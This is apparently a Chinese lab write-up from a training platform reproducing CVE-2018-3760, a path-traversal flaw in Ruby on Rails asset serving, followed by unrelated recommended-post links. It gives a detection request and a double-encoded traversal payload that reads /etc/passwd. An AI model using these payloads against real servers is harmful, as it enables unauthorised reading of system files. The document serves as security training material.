墨者学院 Ruby On Rails漏洞复现第一题(CVE-2018-3760)

打开 web 页面:

发现是Ruby,在Ruby 3.7.1和更低版本中,存在由辅助解码引起的路径遍历漏洞。攻击者可以使用%252e%252e/访问根目录并读取或执行目标服务器上的任何文件。可以先检测一下是否有此漏洞:

cs 复制代码
/assets/file:%2f%2f/etc/passwd

根据报错路劲构造 payload:

/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd

cs 复制代码
/assets/file:///usr/src/blog/app/assets/images/../../../../../../etc/passwd
相关推荐
G等你下课几秒前
使用 Cookie 实现登录登出功能案例
前端·后端
深栈解码3 分钟前
JUC并发编程 CAS运行机制详解
java·后端
深栈解码5 分钟前
JUC并发编程 ThreadLocal解析
java·后端
混乱意志6 分钟前
dgraph example数据导入
数据库·后端
2501_9160074740 分钟前
iOS 接口频繁请求导致流量激增?抓包分析定位与修复全流程
websocket·网络协议·tcp/ip·http·网络安全·https·udp
醇醛酸醚酮酯1 小时前
std::promise和std::future的使用示例——单线程多链接、多线程单链接
网络·c++·算法
Net_Walke1 小时前
【网络协议】WebSocket简介
网络·websocket·网络协议
2501_916013741 小时前
用Fiddler中文版抓包工具掌控微服务架构中的接口调试:联合Postman与Charles的高效实践
websocket·网络协议·tcp/ip·http·网络安全·https·udp
哔哩哔哩技术2 小时前
资源合池化后的异构差异问题解析--CPU分层现象和解决思路
后端
爱上语文2 小时前
Redis基础(4):Set类型和SortedSet类型
java·数据库·redis·后端